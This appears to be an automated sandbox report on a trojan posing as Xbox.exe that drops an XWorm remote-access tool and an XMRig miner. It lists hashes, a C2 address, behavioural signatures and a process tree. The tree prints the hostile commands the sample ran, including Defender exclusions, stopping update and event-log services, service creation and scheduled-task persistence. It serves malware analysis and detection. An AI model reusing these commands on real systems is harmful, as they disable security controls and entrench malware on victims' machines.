Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240730-en -
resource tags
arch:x64arch:x86image:win10v2004-20240730-enlocale:en-usos:windows10-2004-x64system -
submitted
01-08-2024 20:50
Static task
static1
Behavioral task
behavioral1
Sample
Xbox.exe
Resource
win7-20240704-en
General
-
Target
Xbox.exe
-
Size
19.0MB
-
MD5
30880523d777f4fe75ca515c0d6df32b
-
SHA1
73629571c0c7f6bfae8422ff44d79b48e2e13d1f
-
SHA256
7022aee75dbf84ea8b3050fcee637f6f87232dfab7cb7cbd5f5a2062d749c07c
-
SHA512
1276a39236434cb7fc4903f2b75f1f6dceb1522aba70ff2babf70bae7088caeb5463f6f405e8bac51f2b1378c12291828dfa0978aaf009821cf87385d9824f81
-
SSDEEP
196608:Yb61gbgwY5kuaC4FaXtBrlOMOpnLo213diio7eLi4iUK+cTwfnrUzhjzO5quL971:Yo487OsOcTwfOa5L93edRaF/
Malware Config
Extracted
xworm
expected-schema.gl.at.ply.gg:2980
-
Install_directory
%AppData%
-
install_file
XClient.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/2008-29-0x0000000004D10000-0x0000000004D28000-memory.dmp family_xworm -
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/3864-260-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3864-265-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3864-264-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3864-263-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3864-262-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3864-259-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3864-266-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3864-270-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3864-271-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3864-278-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3864-279-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3864-280-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4440 powershell.exe 3908 powershell.exe 2264 powershell.exe 1668 powershell.exe 2152 powershell.exe 1672 powershell.exe -
Creates new service(s) 2 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2951562807-3718269429-4208157415-1000\Control Panel\International\Geo\Nation flux.exe Key value queried \REGISTRY\USER\S-1-5-21-2951562807-3718269429-4208157415-1000\Control Panel\International\Geo\Nation Xbox.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk flux.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk flux.exe -
Executes dropped EXE 6 IoCs
pid Process 3416 build.exe 2008 flux.exe 4548 XboxInstaller.exe 4336 gaexyjbdzroy.exe 4860 XClient.exe 1208 XClient.exe -
resource yara_rule behavioral2/memory/3864-258-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3864-260-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3864-265-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3864-264-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3864-263-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3864-262-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3864-259-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3864-257-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3864-256-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3864-255-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3864-254-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3864-266-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3864-270-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3864-271-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3864-278-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3864-279-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3864-280-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2951562807-3718269429-4208157415-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" flux.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\P: XboxInstaller.exe File opened (read-only) \??\Q: XboxInstaller.exe File opened (read-only) \??\A: XboxInstaller.exe File opened (read-only) \??\E: XboxInstaller.exe File opened (read-only) \??\H: XboxInstaller.exe File opened (read-only) \??\K: XboxInstaller.exe File opened (read-only) \??\N: XboxInstaller.exe File opened (read-only) \??\O: XboxInstaller.exe File opened (read-only) \??\S: XboxInstaller.exe File opened (read-only) \??\Y: XboxInstaller.exe File opened (read-only) \??\B: XboxInstaller.exe File opened (read-only) \??\I: XboxInstaller.exe File opened (read-only) \??\U: XboxInstaller.exe File opened (read-only) \??\V: XboxInstaller.exe File opened (read-only) \??\W: XboxInstaller.exe File opened (read-only) \??\Z: XboxInstaller.exe File opened (read-only) \??\G: XboxInstaller.exe File opened (read-only) \??\J: XboxInstaller.exe File opened (read-only) \??\R: XboxInstaller.exe File opened (read-only) \??\T: XboxInstaller.exe File opened (read-only) \??\L: XboxInstaller.exe File opened (read-only) \??\M: XboxInstaller.exe File opened (read-only) \??\X: XboxInstaller.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 16 ip-api.com -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 3788 powercfg.exe 1740 powercfg.exe 4852 powercfg.exe 4028 powercfg.exe 1100 powercfg.exe 2336 powercfg.exe 4868 powercfg.exe 448 powercfg.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe build.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe gaexyjbdzroy.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4336 set thread context of 2320 4336 gaexyjbdzroy.exe 151 PID 4336 set thread context of 3864 4336 gaexyjbdzroy.exe 156 -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 444 sc.exe 4864 sc.exe 4360 sc.exe 4856 sc.exe 1464 sc.exe 208 sc.exe 976 sc.exe 4072 sc.exe 1432 sc.exe 2736 sc.exe 3568 sc.exe 5116 sc.exe 3152 sc.exe 4704 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language flux.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XboxInstaller.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XClient.exe -
Modifies data under HKEY_USERS 50 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3940 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2152 powershell.exe 2152 powershell.exe 1672 powershell.exe 1672 powershell.exe 4440 powershell.exe 4440 powershell.exe 3908 powershell.exe 3908 powershell.exe 3416 build.exe 2008 flux.exe 2264 powershell.exe 2264 powershell.exe 3416 build.exe 3416 build.exe 3416 build.exe 3416 build.exe 3416 build.exe 3416 build.exe 3416 build.exe 3416 build.exe 3416 build.exe 3416 build.exe 3416 build.exe 3416 build.exe 3416 build.exe 3416 build.exe 4336 gaexyjbdzroy.exe 1668 powershell.exe 1668 powershell.exe 4336 gaexyjbdzroy.exe 4336 gaexyjbdzroy.exe 4336 gaexyjbdzroy.exe 4336 gaexyjbdzroy.exe 4336 gaexyjbdzroy.exe 4336 gaexyjbdzroy.exe 4336 gaexyjbdzroy.exe 4336 gaexyjbdzroy.exe 4336 gaexyjbdzroy.exe 4336 gaexyjbdzroy.exe 4336 gaexyjbdzroy.exe 4336 gaexyjbdzroy.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe 3864 explorer.exe -
Suspicious use of AdjustPrivilegeToken 29 IoCs
description pid Process Token: SeDebugPrivilege 2008 flux.exe Token: SeShutdownPrivilege 4548 XboxInstaller.exe Token: SeCreatePagefilePrivilege 4548 XboxInstaller.exe Token: SeDebugPrivilege 2152 powershell.exe Token: SeDebugPrivilege 1672 powershell.exe Token: SeDebugPrivilege 4440 powershell.exe Token: SeDebugPrivilege 3908 powershell.exe Token: SeDebugPrivilege 2008 flux.exe Token: SeDebugPrivilege 2264 powershell.exe Token: SeShutdownPrivilege 448 powercfg.exe Token: SeCreatePagefilePrivilege 448 powercfg.exe Token: SeShutdownPrivilege 4852 powercfg.exe Token: SeCreatePagefilePrivilege 4852 powercfg.exe Token: SeShutdownPrivilege 3788 powercfg.exe Token: SeCreatePagefilePrivilege 3788 powercfg.exe Token: SeShutdownPrivilege 1740 powercfg.exe Token: SeCreatePagefilePrivilege 1740 powercfg.exe Token: SeDebugPrivilege 1668 powershell.exe Token: SeLockMemoryPrivilege 3864 explorer.exe Token: SeShutdownPrivilege 1100 powercfg.exe Token: SeCreatePagefilePrivilege 1100 powercfg.exe Token: SeShutdownPrivilege 4868 powercfg.exe Token: SeCreatePagefilePrivilege 4868 powercfg.exe Token: SeShutdownPrivilege 2336 powercfg.exe Token: SeCreatePagefilePrivilege 2336 powercfg.exe Token: SeShutdownPrivilege 4028 powercfg.exe Token: SeCreatePagefilePrivilege 4028 powercfg.exe Token: SeDebugPrivilege 4860 XClient.exe Token: SeDebugPrivilege 1208 XClient.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2008 flux.exe -
Suspicious use of WriteProcessMemory 41 IoCs
description pid Process procid_target PID 3148 wrote to memory of 3416 3148 Xbox.exe 86 PID 3148 wrote to memory of 3416 3148 Xbox.exe 86 PID 3148 wrote to memory of 2008 3148 Xbox.exe 87 PID 3148 wrote to memory of 2008 3148 Xbox.exe 87 PID 3148 wrote to memory of 2008 3148 Xbox.exe 87 PID 3148 wrote to memory of 4548 3148 Xbox.exe 88 PID 3148 wrote to memory of 4548 3148 Xbox.exe 88 PID 3148 wrote to memory of 4548 3148 Xbox.exe 88 PID 2008 wrote to memory of 2152 2008 flux.exe 90 PID 2008 wrote to memory of 2152 2008 flux.exe 90 PID 2008 wrote to memory of 2152 2008 flux.exe 90 PID 2008 wrote to memory of 1672 2008 flux.exe 92 PID 2008 wrote to memory of 1672 2008 flux.exe 92 PID 2008 wrote to memory of 1672 2008 flux.exe 92 PID 2008 wrote to memory of 4440 2008 flux.exe 94 PID 2008 wrote to memory of 4440 2008 flux.exe 94 PID 2008 wrote to memory of 4440 2008 flux.exe 94 PID 2008 wrote to memory of 3908 2008 flux.exe 96 PID 2008 wrote to memory of 3908 2008 flux.exe 96 PID 2008 wrote to memory of 3908 2008 flux.exe 96 PID 2008 wrote to memory of 3940 2008 flux.exe 98 PID 2008 wrote to memory of 3940 2008 flux.exe 98 PID 2008 wrote to memory of 3940 2008 flux.exe 98 PID 3140 wrote to memory of 3780 3140 cmd.exe 107 PID 3140 wrote to memory of 3780 3140 cmd.exe 107 PID 2224 wrote to memory of 3544 2224 cmd.exe 138 PID 2224 wrote to memory of 3544 2224 cmd.exe 138 PID 4336 wrote to memory of 2320 4336 gaexyjbdzroy.exe 151 PID 4336 wrote to memory of 2320 4336 gaexyjbdzroy.exe 151 PID 4336 wrote to memory of 2320 4336 gaexyjbdzroy.exe 151 PID 4336 wrote to memory of 2320 4336 gaexyjbdzroy.exe 151 PID 4336 wrote to memory of 2320 4336 gaexyjbdzroy.exe 151 PID 4336 wrote to memory of 2320 4336 gaexyjbdzroy.exe 151 PID 4336 wrote to memory of 2320 4336 gaexyjbdzroy.exe 151 PID 4336 wrote to memory of 2320 4336 gaexyjbdzroy.exe 151 PID 4336 wrote to memory of 2320 4336 gaexyjbdzroy.exe 151 PID 4336 wrote to memory of 3864 4336 gaexyjbdzroy.exe 156 PID 4336 wrote to memory of 3864 4336 gaexyjbdzroy.exe 156 PID 4336 wrote to memory of 3864 4336 gaexyjbdzroy.exe 156 PID 4336 wrote to memory of 3864 4336 gaexyjbdzroy.exe 156 PID 4336 wrote to memory of 3864 4336 gaexyjbdzroy.exe 156
Processes
-
C:\Users\Admin\AppData\Local\Temp\Xbox.exe"C:\Users\Admin\AppData\Local\Temp\Xbox.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3148 -
C:\Users\Public\build.exe"C:\Users\Public\build.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:3416 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2264
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵
- Suspicious use of WriteProcessMemory
PID:3140 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵PID:3780
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:5116
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:208
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:976
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:4072
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:3152
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:448
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4852
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1740
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3788
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "LNETTCDY"3⤵
- Launches sc.exe
PID:2736
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "LNETTCDY" binpath= "C:\ProgramData\jqznuyxniafn\gaexyjbdzroy.exe" start= "auto"3⤵
- Launches sc.exe
PID:444
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:4864
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "LNETTCDY"3⤵
- Launches sc.exe
PID:4704
-
-
-
C:\Users\Public\flux.exe"C:\Users\Public\flux.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\flux.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2152
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'flux.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1672
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4440
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3908
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3940
-
-
-
C:\Users\Public\XboxInstaller.exe"C:\Users\Public\XboxInstaller.exe"2⤵
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4548
-
-
C:\ProgramData\jqznuyxniafn\gaexyjbdzroy.exeC:\ProgramData\jqznuyxniafn\gaexyjbdzroy.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4336 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1668
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:3544
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:3568
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:4360
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:4856
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:1432
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:1464
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4028
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1100
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2336
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4868
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:2320
-
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3864
-
-
C:\Users\Admin\AppData\Roaming\XClient.exeC:\Users\Admin\AppData\Roaming\XClient.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4860
-
C:\Users\Admin\AppData\Roaming\XClient.exeC:\Users\Admin\AppData\Roaming\XClient.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1208
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
611B
MD50ac178e97bb01bbc54e3e8e56557bb94
SHA1c867e788182ed35a331b643d557c1fb0056db87e
SHA2562bc4f3fb1aef5822fcf28fab63a766249870cddc64af10138bf1e33fe4315878
SHA51207ef4a4cf9f553485c2c1e405e42d15f70040c1e552b75cddb8030a1a96bf929828097538664565aa1a04a48627753058e8fe00ba2f44bda26210f2573ebbeeb
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
